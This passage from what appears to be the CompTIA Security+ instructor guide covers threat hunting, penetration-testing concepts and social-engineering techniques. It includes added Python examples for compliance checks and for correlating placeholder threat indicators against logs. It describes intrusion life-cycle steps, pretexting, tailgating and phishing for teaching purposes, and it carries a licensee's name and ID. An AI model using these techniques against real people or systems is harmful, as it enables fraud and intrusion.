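    Rule("Event Audit", "AuditLogonEvents", "==", 3, "3 = audit logon success and failure"),
]


@dataclass(frozen=True)
class CheckResult:
    rule: Rule
    actual: Optional[int]

    @property
    def status(self) -> str:
        if self.actual is None:
            return "NOT CONFIGURED"  # a missing control, not just a weak one
        return "PASS" if _OPS[self.rule.op](self.actual, self.rule.expected) else "FAIL"


def load_policy(text: str) -> configparser.ConfigParser:
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key names' case exactly as exported
    parser.read_string(text)
    return parser


def review_configuration(policy_text: str, template: List[Rule]) -> List[CheckResult]:
    """Evaluate every template rule against the exported policy."""
    policy = load_policy(policy_text)
    results = []
    for rule in template:
        raw = policy.get(rule.section, rule.key, fallback=None)
        actual = None
        if raw is not None:
            value = raw.strip().strip('"')
            if value.lstrip("-").isdigit():
                actual = int(value)
        results.append(CheckResult(rule, actual))
    return results


def failing_keys(results: List[CheckResult]) -> List[str]:
    """Keys that need remediation, in a stable order for the report."""
    return sorted(r.rule.key for r in results if r.status != "PASS")


if __name__ == "__main__":
    for r in review_configuration(SAMPLE_LOCAL_POLICY, SAMPLE_TEMPLATE):
        print(f"{r.status:14} {r.rule.key} (local={r.actual}, template {r.rule.op} {r.rule.expected}): {r.rule.rationale}")
```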


Scan templates supporting compliance scans in Nessus Manager.
(Screenshot used with permission from Tenable Network Security.)

Show Slide(s): Threat Hunting

Threat Hunting
Where vulnerability scanning uses lists of patches and standard definitions of baseline
configurations, threat hunting is an assessment technique that utilizes insights
gained from threat intelligence to proactively discover whether there is evidence of
TTPs already present within the network or system. This contrasts with a reactive
process that is only triggered when alert conditions are reported through an incident
management system. You can also contrast threat hunting with penetration testing.
Where a pen test attempts to achieve some sort of system intrusion or concrete
demonstration of weakness, threat hunting is based only on analysis of data within the
system. To that extent, it is less potentially disruptive than pen testing.

Teaching Tip: Threat hunting is a new addition to the syllabus. Explain how its role
compares to vulnerability scanning and penetration testing.

A threat hunting project is likely to be led by senior security analysts, but some general
points to observe include:
• Advisories and bulletins—threat hunting is a labor-intensive activity and so needs
to be performed with clear goals and resources. Threat hunting usually proceeds
according to some hypothesis of possible threat. Security bulletins and advisories
from vendors and security researchers about new TTPs and/or vulnerabilities may
be the trigger for establishing a threat hunt. For example, if threat intelligence
reveals that Windows desktops in many companies are being infected with a new
type of malware that is not being blocked by any current malware definitions, you
might initiate the following threat-hunting plan to detect whether the malware is
also infecting your systems.

• Intelligence fusion and threat data—threat hunting can be performed by manual
analysis of network and log data, but this is a very lengthy process. An organization
with a security information and event management (SIEM) and threat analytics
platform can apply intelligence fusion techniques. The analytics platform is kept up
to date with a TTP and IoC threat data feed. Analysts can develop queries and filters
to correlate threat data against on-premises data from network traffic and logs. This
process may also be partially or wholly automated using AI-assisted analysis and
correlation.

• Maneuver—when investigating a suspected live threat, you must remember the
adversarial nature of hacking. A capable threat actor is likely to have anticipated
the likelihood of threat hunting, and attempted to deploy countermeasures
to frustrate detection. For example, the attacker may trigger a DDoS attack to
divert the security team's attention, and then attempt to accelerate plans to
achieve actions on objectives. Maneuver is a military doctrine term relating to
obtaining positional advantage (ccdcoe.org/uploads/2012/01/3_3_Applegate_
ThePrincipleOfManeuverInCyberOperations.pdf). As an example of defensive
maneuver, threat hunting might use passive discovery techniques so that threat
actors are given no hint that an intrusion has been discovered before the security
team has a containment, eradication, and recovery plan.
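Intelligence fusion in miniature, as an added example that is not part of the CompTIA guide: the feed indicators, TTP tags and log lines below are constructed (documentation IP ranges, reserved .example domains, hashes derived from placeholder strings), and the hunt correlates them against DNS, proxy and endpoint events in the way an analyst's SIEM query or filter would, grouping hits per host so that an entity with several distinct matched TTPs stands out from an isolated indicator.

```python
"""Intelligence fusion in miniature: correlate a TTP/IoC threat feed against
on-premises DNS, proxy and endpoint logs. Added example, not code from the
CompTIA guide; feed entries, TTP tags and log lines are all constructed."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed threat feed. Each indicator maps to the TTP the intelligence ties
# it to (ATT&CK-style tags used purely as illustrative labels), so a hit
# immediately tells the analyst which hypothesis it supports.
CONSTRUCTED_SAMPLE_HASH = hashlib.sha256(b"constructed sample, not real malware").hexdigest()
THREAT_FEED: Dict[str, Dict[str, str]] = {
    "domain": {"updates-cdn.example": "T1071.001 C2 over web protocols"},
    "ip": {"203.0.113.45": "T1071.001 C2 over web protocols"},
    "sha256": {CONSTRUCTED_SAMPLE_HASH: "T1204.002 user execution of malicious file"},
}

# Constructed on-prem log lines in three formats a SIEM would normalize.
LOG_LINES = [
    "2021-08-30T09:12:01Z dns client=10.0.5.21 query=intranet.corp.example type=A",
    "2021-08-30T09:12:07Z dns client=10.0.5.21 query=updates-cdn.example type=A",
    "2021-08-30T09:12:09Z proxy src=10.0.5.21 dst=203.0.113.45:443 action=ALLOW",
    "2021-08-30T09:13:44Z proxy src=10.0.7.8 dst=198.51.100.7:443 action=ALLOW",
    f"2021-08-30T09:14:02Z edr host=WS-0521 proc=invoice_viewer.exe sha256={CONSTRUCTED_SAMPLE_HASH}",
    "2021-08-30T09:15:30Z edr host=WS-0708 proc=notepad.exe sha256=" + "0" * 64,
]

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<source>dns|proxy|edr) (?P<kv>.*)$")


@dataclass(frozen=True)
class Hit:
    timestamp: str
    source: str
    entity: str       # client IP or hostname the event came from
    ioc_type: str
    ioc: str
    ttp: str


def parse_line(line: str) -> Dict[str, str]:
    """Turn one log line into a flat dict; unknown formats yield an empty dict."""
    m = LINE_RE.match(line)
    if not m:
        return {}
    fields = {"ts": m.group("ts"), "source": m.group("source")}
    for token in m.group("kv").split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def extract_candidates(fields: Dict[str, str]) -> List[Tuple[str, str]]:
    """Map a parsed event to (ioc_type, value) pairs worth checking against the feed."""
    src = fields.get("source")
    if src == "dns":
        return [("domain", fields.get("query", ""))]
    if src == "proxy":
        return [("ip", fields.get("dst", "").rsplit(":", 1)[0])]
    if src == "edr":
        return [("sha256", fields.get("sha256", "").lower())]
    return []


def hunt(lines: List[str], feed: Dict[str, Dict[str, str]]) -> List[Hit]:
    """Correlate every log line with the feed; returns one Hit per matching indicator."""
    hits: List[Hit] = []
    for line in lines:
        fields = parse_line(line)
        if not fields:
            continue
        entity = fields.get("client") or fields.get("src") or fields.get("host", "?")
        for ioc_type, value in extract_candidates(fields):
            ttp = feed.get(ioc_type, {}).get(value)
            if ttp:
                hits.append(Hit(fields["ts"], fields["source"], entity, ioc_type, value, ttp))
    return hits


def hits_by_entity(hits: List[Hit]) -> Dict[str, List[str]]:
    """Group matched TTPs per host/client; several distinct TTPs on one entity
    strengthen the hypothesis more than one isolated indicator does."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for h in hits:
        if h.ttp not in grouped[h.entity]:
            grouped[h.entity].append(h.ttp)
    return dict(grouped)


if __name__ == "__main__":
    found = hunt(LOG_LINES, THREAT_FEED)
    for h in found:
        print(f"{h.timestamp} {h.source:<5} {h.entity:<10} {h.ioc_type}={h.ioc[:20]} -> {h.ttp}")
    print(hits_by_entity(found))
```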


Review Activity:
Vulnerability Scanning Techniques
Answer the following questions:

1. You have received an urgent threat advisory and need to configure a
network vulnerability scan to check for the presence of a related CVE
on your network. What configuration check should you make in the
vulnerability scanning software before running the scan?

Verify that the vulnerability feed/plug-in/test has been updated with the specific CVE
that you need to test for.

2. You have configured a network vulnerability scanner for an engineering
company. When running a scan, multiple sensors within an embedded
systems network became unresponsive, causing a production shutdown.
What alternative method of vulnerability scanning should be used for the
embedded systems network?

A fully non-intrusive solution should be adopted, such as sniffing traffic using a
network tap or mirror port. Using the network traffic to detect vulnerabilities rather
than actively probing each device will not cause system stability issues (though there is
greater risk of false positive and false negative results).

3. A vulnerability scan reports that a CVE associated with CentOS Linux is
present on a host, but you have established that the host is not running
CentOS. What type of scanning error event is this?

False positive.

4. A small company that you provide security consulting support to has
resisted investing in an event management and threat intelligence
platform. The CEO has become concerned about an APT risk known to
target supply chains within the company's industry sector and wants you
to scan their systems for any sign that they have been targeted already.
What are the additional challenges of meeting this request, given the lack of
investment?

Collecting network traffic and log data from multiple sources and then analyzing
it manually will require many hours of analyst time. The use of threat feeds and
intelligence fusion to automate parts of this analysis effort would enable a much
swifter response.

5. What term relates to assessment techniques that avoid alerting threat
actors?

This can be referred to as maneuver.


Topic 3D
Explain Penetration Testing Concepts

EXAM OBJECTIVES COVERED
1.8 Explain the techniques used in penetration testing

Teaching Tip: As this is an explain-level objective, students only need an overview of
penetration testing, and not detailed practical procedures.

Automated vulnerability scanning does not test what a highly capable threat actor
might be able to achieve. Penetration testing is a type of assessment that adopts
known tactics and techniques to attempt intrusions. Devising, planning, and leading
penetration tests is a specialized security role, but at a junior level you are likely
to participate in this type of engagement, so you should be able to explain the
fundamental principles.

Show Slide(s): Penetration Testing

Penetration Testing
Teaching Tip: Make sure students can distinguish vulnerability assessment from pen
testing.

A penetration test—often shortened to pen test—uses authorized hacking techniques
to discover exploitable weaknesses in the target's security systems. Pen testing is also
referred to as ethical hacking. A pen test might involve the following steps:

• Verify a threat exists—use surveillance, social engineering, network scanners, and
vulnerability assessment tools to identify a vector by which vulnerabilities could
be exploited.

• Bypass security controls—look for easy ways to attack the system. For example, if
the network is strongly protected by a firewall, is it possible to gain physical access
to a computer in the building and run malware from a USB stick?

• Actively test security controls—probe controls for configuration weaknesses and
errors, such as weak passwords or software vulnerabilities.

• Exploit vulnerabilities—prove that a vulnerability is high risk by exploiting it to gain
access to data or install backdoors.

The key difference from passive vulnerability assessment is that an attempt is made
to actively test security controls and exploit any vulnerabilities discovered. Pen testing
is an intrusive assessment technique. For example, a vulnerability scan may reveal
that an SQL Server has not been patched to safeguard against a known exploit. A
penetration test would attempt to use the exploit to perform code injection and
compromise and "own" (or "pwn" in hacker idiom) the server. This provides active
testing of security controls. Even though the potential for the exploit exists, in practice
the permissions on the server might prevent an attacker from using it. This would not
be identified by a vulnerability scan, but should be proven or not proven to be the case
by penetration testing.

Show Slide(s): Rules of Engagement

Rules of Engagement
Security assessments might be performed by employees or may be contracted to
consultants or other third parties. Rules of engagement specify what activity is
permitted or not permitted. These rules should be made explicit in a contractual
agreement. For example, a pen test should have a concrete objective and scope rather
than a vague type of "Break into the network" aim. There may be systems and data
that the penetration tester should not attempt to access or exploit. Where a pen test
involves third-party services (such as a cloud provider), authorization to conduct the
test must also be sought from the third party.

Teaching Tip: Make sure students can distinguish between black box, white box, and
gray box.

The Pentest-Standard website provides invaluable commentary on the conduct of pen tests
(pentest-standard.readthedocs.io/en/latest/tree.html).

Attack Profile
Attacks come from different sources and motivations. You may wish to test both
resistance to external (targeted and untargeted) and insider threats. You need to
determine how much information about the network to provide to the consultant:
• Black box (or unknown environment)—the consultant is given no privileged
information about the network and its security systems. This type of test would
require the tester to perform a reconnaissance phase. Black box tests are useful for
simulating the behavior of an external threat.

• White box (or known environment)—the consultant is given complete access to
information about the network. This type of test is sometimes conducted as a
follow-up to a black box test to fully evaluate flaws discovered during the black box
test. The tester skips the reconnaissance phase in this type of test. White box tests
are useful for simulating the behavior of a privileged insider threat.

• Gray box (or partially known environment)—the consultant is given some
information; typically, this would resemble the knowledge of junior or non-IT
staff to model particular types of insider threats. This type of test requires partial
reconnaissance on the part of the tester. Gray box tests are useful for simulating
the behavior of an unprivileged insider threat.

A test where the attacker has no knowledge of the system but where staff are informed
that a test will take place is referred to as a blind (or single-blind) test. A test where staff
are not made aware that a pen test will take place is referred to as a double-blind test.

Bug Bounty
A bug bounty is a program operated by a software vendor or website operator where
rewards are given for reporting vulnerabilities. Where a pen test is performed on a
contractual basis, costed by the consultant, a bug bounty program is a way of crowd-
sourcing detection of vulnerabilities. Some bug bounties are operated as internal
programs, with rewards for employees only. Most are open to public submissions
(tripwire.com/state-of-security/security-data-protection/cyber-security/essential-bug-
bounty-programs).

Show Slide(s): Exercise Types

Teaching Tip: Note that purple is not necessarily a separate team (possibly one or more
facilitators), but a different way of structuring the exercise. You might want to note the
use of "rainbow" teams to include DevOps (blackhat.com/docs/us-17/wednesday/
us-17-Wright-Orange-Is-The-New-Purple-wp.pdf).

Exercise Types
Some of the techniques used in penetration testing may also be employed as an
exercise between two competing teams:

• Red team—performs the offensive role to try to infiltrate the target.

• Blue team—performs the defensive role by operating monitoring and alerting
controls to detect and prevent the infiltration.

There will also often be a white team, which sets the rules of engagement and
monitors the exercise, providing arbitration and guidance, if necessary. If the red team
is third party, the white team will include a representative of the consultancy company.


One critical task of the white team is to halt the exercise should it become too risky. For
example, an actual threat actor may attempt to piggyback a backdoor established by
the red team.
In a red versus blue team exercise, the typical process is for the red team to attempt
the intrusion and either succeed or fail, and then to write a summary report. This
confrontational structure does not always promote constructive development and
improvement. In a purple team exercise, the red and blue teams meet for regular
debriefs while the exercise is ongoing. The red team might reveal where they have been
successful and collaborate with the blue team on working out a detection mechanism.
This process might be assisted by purple team members acting as facilitators. The
drawback of a purple team exercise is that without blind or double-blind conditions,
there is no simulation of a hostile adversary and the stresses of dealing with that.

Show Slide(s): Passive and Active Reconnaissance

Passive and Active Reconnaissance
Analysis of adversary TTPs has established various "kill chain" models of the way
modern cyber-attacks are conducted. A penetration testing engagement will generally
use the same sort of techniques.

Teaching Tip: Make sure students understand the terminology and can distinguish
passive from active techniques.

In the first reconnaissance phase for black box testing, the pen tester establishes a
profile of the target of investigation and surveys the attack surface for weaknesses.
Reconnaissance activities can be classed as passive or active. Passive reconnaissance is
not likely to alert the target of the investigation as it means querying publicly available
information. Active reconnaissance has more risk of detection. Active techniques might
involve gaining physical access to premises or using scanning tools on the target's web
services and other networks.

• Open Source Intelligence (OSINT)—using web search tools, social media, and
sites that scan for vulnerabilities in Internet-connected devices and services
(securitytrails.com/blog/osint-tools) to obtain information about the target. OSINT
aggregation tools, such as theHarvester (github.com/laramies/theHarvester), collect
and organize this data from multiple sources. OSINT requires almost no privileged
access as it relies on finding information that the company makes publicly available,
whether intentionally or not. This is a passive technique.

• Social engineering—this refers to obtaining information, physical access to
premises, or even access to a user account through the art of persuasion. While the
amount of interaction may vary, this can be classed as an active technique.

• Footprinting—using software tools, such as Nmap (nmap.org), to obtain
information about a host or network topology. Scans may be launched against
web hosts or against wired or wireless network segments, if the attacker can gain
physical access to them. While passive footprinting is possible (by limiting it to
packet sniffing), most scan techniques require active network connections with the
target that can be picked up by detection software.

• War driving—mapping the location and type (frequency channel and security
method) of wireless networks operated by the target. Some of these networks may
be accessible from outside the building. Simply sniffing the presence of wireless
networks is a passive activity, though there is the risk of being observed by security
guards or cameras. An attacker might be able to position rogue access points, such
as the Hak5 Pineapple (shop.hak5.org/products/wifi-pineapple), or perform other
wireless attacks using intelligence gathered from war driving.

• Drones/unmanned aerial vehicle (UAV)—allow the tester to reconnoiter campus
premises, and even to perform war driving from the air (war flying). A tool such as the
Wi-Fi Pineapple can easily be incorporated on a drone (hackaday.com/2018/05/27/
watch-dogs-inspired-hacking-drone-takes-flight). Drones also provide a vector for
one enduringly popular social engineering technique: dropping infected USB media
around premises, with the expectation that at least some of them will be picked up
and used (blackhat.com/docs/us-16/materials/us-16-Bursztein-Does-Dropping-USB-
Drives-In-Parking-Lots-And-Other-Places-Really-Work.pdf).

Show Slide(s): Pen Test Attack Life Cycle

Pen Test Attack Life Cycle
In the kill chain attack life cycle, reconnaissance is followed by an initial exploitation
phase where a software tool is used to gain some sort of access to the target's
network. This foothold might be accomplished using a phishing email and payload or
by obtaining credentials via social engineering. Having gained the foothold, the pen
tester can then set about securing and widening access. A number of techniques are
required:

Teaching Tip: Make sure students can use this terminology.

• Persistence—the tester's ability to reconnect to the compromised host and use
it as a remote access tool (RAT) or backdoor. To do this, the tester must establish
a command and control (C2 or C&C) network to use to control the compromised
host, upload additional attack tools, and download exfiltrated data. The connection
to the compromised host will typically require a malware executable to run after
shutdown/log off events and a connection to a network port and the attacker's IP
address to be available.

• Privilege escalation—persistence is followed by further reconnaissance, where


the pen tester attempts to map out the internal network and discover the services
running on it and accounts configured to access it. Moving within the network or
accessing data assets are likely to require higher privilege levels. For example,
the original malware may have run with local administrator privileges on a client
workstation or as the Apache user on a web server. Another exploit might allow
malware to execute with system/root privileges, or to use network administrator
privileges on other hosts, such as application servers.

• Lateral movement—gaining control over other hosts. This is done partly to
discover more opportunities to widen access (harvesting credentials, detecting
software vulnerabilities, and gathering other such "loot"), partly to identify where
valuable data assets might be located, and partly to evade detection. Lateral
movement usually involves executing the attack tools over remote process shares
or using scripting tools, such as PowerShell.

• Pivoting—hosts that hold the most valuable data are not normally able to access
external networks directly. If the pen tester achieves a foothold on a perimeter
server, a pivot allows them to bypass a network boundary and compromise servers
on an inside network. A pivot is normally accomplished using remote access and
tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or
remote desktop.

• Actions on Objectives—for a threat actor, this means stealing data from one or
more systems (data exfiltration). From the perspective of a pen tester, it would be a
matter of the scope definition whether this would be attempted. In most cases, it is
usually sufficient to show that actions on objectives could be achieved.

• Cleanup—for a threat actor, this means removing evidence of the attack, or at least
evidence that could implicate the threat actor. For a pen tester, this phase means
removing any backdoors or tools and ensuring that the system is not less secure
than the pre-engagement state.


Review Activity:
Penetration Testing Concepts
Answer the following questions:

1. A website owner wants to evaluate whether the site security mitigates risks
from criminal syndicates, assuming no risk of insider threat. What type of
penetration testing engagement will most closely simulate this adversary
capability and resources?

A threat actor has no privileged information about the website configuration or
security controls. This is simulated in a black box (or blind) pen test engagement.

2. You are agreeing a proposal to run a series of team-based exercises to test
security controls under different scenarios. You propose using purple team
testing, but the contracting company is only familiar with the concept of red
and blue teams. What is the advantage of running a purple team exercise?

In a red versus blue team, there is no contact between the teams, and no opportunity
to collaborate on improving security controls. In a purple team exercise, there is
regular contact and knowledge sharing between the teams throughout the progression
of the exercise.

3. Why should an Internet service provider (ISP) be informed before pen
testing on a hosted website takes place?

ISPs monitor their networks for suspicious traffic and may block the test attempts. The
pen test may also involve equipment owned and operated by the ISP.

4. What tools are used for OSINT?

Open-source intelligence is a reconnaissance activity to gather information about the
target from any public source. The basic tool is web searches/queries plus sites that
scan/scrape/monitor vulnerabilities in Internet-facing services and devices. There are
also specialist OSINT tools, such as theHarvester, that aggregate data from queries for
different resources.

5. In the context of penetration testing, what is persistence?

Persistence refers to the tester's ability to reconnect to the compromised host and use
it as a remote access tool (RAT) or backdoor.


Lesson 3
Summary
You should be able to summarize types of security assessments, such as vulnerability,
threat hunting, and penetration testing. You should also be able to explain general
procedures for conducting these assessments.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions about. If
you have used all the available time for this lesson block, note the issues, and schedule
time for a review later in the course.

Interaction Opportunity: Optionally, discuss with students which security assessments
they have used in their workplaces, or which could be of most benefit.

Guidelines for Performing Security Assessments
Follow these guidelines when you consider the use of security assessments:
• Identify the procedures and tools that are required to scan the attack surface for
vulnerabilities. This might mean provisioning passive network scanners, active
remote or agent-based network scanners, and application or web application
scanners.

• Develop a configuration and maintenance plan to ensure secure use of any
credentialed scans and updates to vulnerability feeds.

• Run scans regularly and review the results to identify false positives and false
negatives, using log review and additional CVE information to validate results if
necessary.

• Schedule configuration reviews and remediation plans, using CVSS vulnerability
criticality to prioritize actions.

• Consider implementing threat hunting programs, monitoring advisories and
bulletins for new threat sources. Note that threat hunting might require investment
in resources to supply intelligence fusion and threat data.

• Consider implementing penetration testing exercises, ensuring that these are set
up with clear rules of engagement for red/blue or purple team exercise types and
black/white/gray box disclosure.

• Run penetration tests using a structured kill chain life cycle, with reconnaissance,
exploitation, persistence, privilege escalation, lateral movement/pivoting, actions on
objectives, and cleanup phases.

Lesson 4
Identifying Social Engineering and Malware

LESSON INTRODUCTION

Teaching Tip: This lesson concludes the assess phase of the course by looking at the
mechanisms used to effect an intrusion and identifying social engineering and malware
TTPs and indicators.

It is not sufficient for security assessments to focus solely on software vulnerabilities
and configuration errors. As well as these hardware and software systems, the
attack surface contains a company's employees and the degree to which they can
be exploited to gain unauthorized access or privileges. Threat actors use social
engineering techniques to elicit information, obtain access to premises, and to trick
users into running malicious code. You must understand these attacks and train
your colleagues and customers with the ability to detect and report them. As well as
being able to explain these techniques, you must be able to describe the indicators
associated with different types of malware and analyze your systems for possible
infections.

Lesson Objectives
In this lesson, you will:
• Compare and contrast social engineering techniques.

• Analyze indicators of malware-based attacks.


Topic 4A
Compare and Contrast Social Engineering Techniques

EXAM OBJECTIVES COVERED
1.1 Compare and contrast different types of social engineering techniques

Teaching Tip: Social engineering is established as a topic at A+ level, so students should
be familiar with the basics. Focus on principles, the more specific techniques, and the
new additions for this syllabus version.

People (employees, contractors, suppliers, and customers) represent part of the
attack surface of any organization. A person with permissions on the system is a
potential target of social engineering. Being able to compare and contrast social
engineering techniques will help you to lead security awareness training and to develop
policies and other security controls to mitigate these risks.

Show Slide(s): Social Engineering

Social Engineering
Teaching Tip: Note that social engineering includes written communication as well as
face-to-face interaction. You can refer students to Kevin Mitnick's books
(mitnicksecurity.com) and Bruce Schneier's website (schneier.com/essays/social).

Adversaries can use a diverse range of techniques to compromise a security system.
A prerequisite of many types of attacks is to obtain information about the network
and security system. Social engineering refers to means of either eliciting information
from someone or getting them to perform some action for the threat actor. It can also
be referred to as "hacking the human." Social engineering might be used to gather
intelligence as reconnaissance in preparation for an intrusion, or it might be used to
effect an actual intrusion. Typical social engineering intrusion scenarios include:

• An attacker creates an executable file that prompts a network user for their
password, and then records whatever the user inputs. The attacker then emails
the executable file to the user with the story that the user must double-click the file
and log on to the network again to clear up some logon problems the organization
has been experiencing that morning. After the user complies, the attacker now has
access to their network credentials.

• An attacker contacts the help desk pretending to be a remote sales representative
who needs assistance setting up remote access. Through a series of phone calls,
the attacker obtains the name/address of the remote access server and login
credentials, in addition to phone numbers for remote access and for accessing the
organization's private phone and voice mail system.

• An attacker triggers a fire alarm and then slips into the building during the
confusion and attaches a monitoring device to a network port.

Show Slide(s): Social Engineering Principles

Interaction Opportunity: Ask whether any students have been subjected to social
engineering attempts and what the experience was like.

Social Engineering Principles
Social engineering is one of the most common and successful malicious techniques.
Because it exploits basic human trust, social engineering has proven to be a particularly
effective way of manipulating people into performing actions that they might not
otherwise perform. To be persuasive, social engineering attacks rely on one or more of
the following principles.


Familiarity/Liking
Some people have the sort of natural charisma that allows them to persuade others
to do as they request. One of the basic tools of a social engineer is simply to be affable
and likable, and to present the requests they make as completely reasonable and
unobjectionable. This approach is relatively low risk as even if the request is refused,
it is less likely to cause suspicion and the social engineer may be able to move on to a
different target without being detected.

Consensus/Social Proof
The principle of consensus or social proof refers to the fact that without an explicit
instruction to behave in a certain way, many people will act just as they think others
would act. A social engineering attack can use this instinct either to persuade the
target that to refuse a request would be odd ("That's not something anyone else has
ever said no to") or to exploit polite behavior to slip into a building while someone
holds the door for them. As another example, an attacker may be able to fool a user
into believing that a malicious website is actually legitimate by posting numerous fake
reviews and testimonials praising the site. The victim, believing many different people
have judged the site acceptable, takes this as evidence of the site's legitimacy and
places their trust in it.

Authority and Intimidation
Many people find it difficult to refuse a request by someone they perceive as superior
in rank or expertise. Social engineers can try to exploit this behavior to intimidate
their target by pretending to be a senior executive. An attack might be launched by
impersonating someone who would often be deferred to, such as a police officer,
judge, or doctor. Another technique is using spurious technical arguments and jargon.
Social engineering can exploit the fact that few people are willing to admit ignorance.
Compared to using a familiarity/liking sort of approach, this sort of adversarial tactic
might be riskier to the attacker as there is a greater chance of arousing suspicion and
the target reporting the attack attempt.

Scarcity and Urgency
Often also deployed by salespeople, creating a false sense of scarcity or urgency can
disturb people's ordinary decision-making process. The social engineer can try to
pressure his or her target by demanding a quick response. For example, the social
engineer might try to get the target to sign up for a "limited time" or "invitation only"
trial and request a username and password for the service (hoping that the target
will offer a password he or she has used for other accounts). Fake antivirus products
generate a sense of urgency by trying to trick users into thinking that their computer is
already infected with malware.

Impersonation and Trust
Impersonation simply means pretending to be someone else. It is one of the basic social engineering techniques. Impersonation can use either a consensus/liking or intimidating approach. Impersonation is possible where the target cannot verify the attacker's identity easily, such as over the phone or via an email message.
The classic impersonation attack is for the social engineer to phone into a department, claim they have to adjust something on the user's system remotely, and get the user to reveal their password. This specific attack is also referred to as pretexting.

Lesson 4: Identifying Social Engineering and Malware | Topic 4A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
76 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Do you really know who's on the other end of the line?

Making a convincing impersonation and establishing a trust with the target usually depends on the attacker obtaining privileged information about the organization. For example, where the attacker impersonates a member of the organization's IT support team, the attack will be more effective with identity details of the person being impersonated and the target.
Some social engineering techniques are dedicated to obtaining this type of intelligence as a reconnaissance activity. As most companies are set up toward customer service rather than security, this information is typically quite easy to come by. Information that might seem innocuous, such as department employee lists, job titles, phone numbers, diaries, invoices, or purchase orders, can help an attacker penetrate an organization through impersonation.

Dumpster Diving and Tailgating
Social engineering includes physical attacks to steal information or gain access.
Dumpster Diving
Dumpster diving refers to combing through an organization's (or individual's) garbage to try to find useful documents (or even files stored on discarded removable media).
Remember that attacks may be staged over a long period. Initial attacks may only aim at compromising low-level information and user accounts, but this low-level information can be used to attack more sensitive and confidential data and better protected management and administrative accounts.
Teaching Tip: It's also worth noting the risks of social networking sites and how much PII can be exposed through profiles on Facebook, et al.

Tailgating and Piggy Backing
Tailgating is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. Piggy backing is a similar situation, but means that the attacker enters a secure area with an employee's permission. For instance, an attacker might impersonate a member of the cleaning crew and request that an employee hold the door open while they bring in a cleaning cart or mop bucket. Alternatively, piggy backing may be a means for an insider threat actor to allow access to someone without recording it in the building's entry log. Another technique is to persuade someone to hold a door open, using an excuse, such as "I've forgotten my badge/key."


Identity Fraud and Invoice Scams
Identity fraud is a specific type of impersonation where the attacker uses specific details of someone's identity. A typical consumer identity fraud is using someone else's name and address to make a loan application or using stolen credit card details to start a mobile phone contract. Invoice scams are another common type of identity fraud. The fraudster will usually spoof the invoice details of a genuine supplier, but change the bank account number. This might rely on the target not double-checking the account, or it might be combined with a social engineering contact call to convince the target that the account change is genuine.

Sometimes the terms identity fraud and identity theft are used to distinguish between making up an identity versus stealing someone else's identity.

In terms of attacks on corporate networks, identity fraud is likely to involve compromising a computer account. Various social engineering techniques can be used to obtain account credentials without having to rely on malware. Apart from eliciting credential information from a user directly, some of these techniques include:
• Credential databases: account details from previous attacks are widely available (haveibeenpwned.com). An attacker can try to match a target in one of these databases and hope that they have reused a password. The attacker could also leverage third-party sites for impersonation. For example, rather than using a work account, they could gain control of a social media account.

• Shoulder surfing: a threat actor can learn a password or PIN (or other secure information) by watching the user type it. Despite the name, the attacker may not have to be in close proximity to the target; they could use high-powered binoculars or CCTV to directly observe the target remotely.
• Lunchtime attacks: most authentication methods are dependent on the physical security of the workstation. If a user leaves a workstation unattended while logged on, an attacker can physically gain access to the system. This is often described as a lunchtime attack. Most operating systems are set to activate a password-protected screen saver after a defined period of no keyboard or mouse activity. Users should also be trained to lock or log off the workstation whenever they leave it unattended.

Phishing, Whaling, and Vishing
Phishing is a combination of social engineering and spoofing. It persuades or tricks the target into interacting with a malicious resource disguised as a trusted one, traditionally using email as the vector. A phishing message might try to convince the user to perform some action, such as installing disguised malware or allowing a remote access connection by the attacker. Other types of phishing campaign use a spoof website set up to imitate a bank or e-commerce site or some other web resource that should be trusted by the target. The attacker then emails users of the genuine website informing them that their account must be updated or with some sort of hoax alert or alarm, supplying a disguised link that actually leads to the spoofed site. When the user authenticates with the spoofed site, their logon credentials are captured.
Teaching Tip: Some of this terminology is of limited value, but students need to learn it. The basic points are that phishing can use any type of communication method to trick the target into interacting with a spoofed resource, and can either be general in nature or highly targeted.


Example phishing email. On the right, you can see the message in its true form as the mail client has stripped out the formatting (shown on the left) designed to disguise the nature of the links.

There are several phishing variants to be aware of:
• Spear phishing: a phishing scam where the attacker has some information that makes an individual target more likely to be fooled by the attack. Each phishing message is tailored to address a specific target user. The attacker might know the name of a document that the target is editing, for instance, and send a malicious copy, or the phishing email might show that the attacker knows the recipient's full name, job title, telephone number, or other details that help convince the target that the communication is genuine.
• Whaling: a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish"). Upper management may also be more vulnerable to ordinary phishing attacks because of their reluctance to learn basic security procedures.
• Vishing: a phishing attack conducted through a voice channel (telephone or VoIP, for instance). For example, targets could be called by someone purporting to represent their bank asking them to verify a recent credit card transaction and requesting their security details. It can be much more difficult for someone to refuse a request made in a phone call compared to one made in an email.
Rapid improvements in deep fake technology (forbes.com/sites/jessedamiani/2019/09/03/a-voice-deepfake-was-used-to-scam-a-ceo-out-of-243000) are likely to make phishing attempts via voice and even video messaging more prevalent in the future.
• SMiShing: this refers to using simple message service (SMS) text communications as the vector.

Spam, Hoaxes, and Prepending
Unsolicited email, or spam, is used as the vector for many attacks. Threat actors harvest email addresses from marketing lists or databases of historic privacy breaches, or might try to target every email address at a certain company. Mass mail attacks could also be perpetrated over any type of instant messaging or Internet messaging service (SPIM).
Hoaxes, such as security alerts or chain emails, are another common social engineering technique, often combined with phishing attacks. An email alert or web pop-up will claim to have identified some sort of security problem, such as virus infection, and offer a tool to fix the problem. The tool of course will be some sort of Trojan application. Malvertising exploits the use of space on legitimate websites set aside for advertising served from content delivery networks (CDNs) without much oversight (blog.talosintelligence.com malvertising-deepdive.html). Criminals will also use sophisticated phone call scams to try to trick users into revealing login credentials or financial account details.
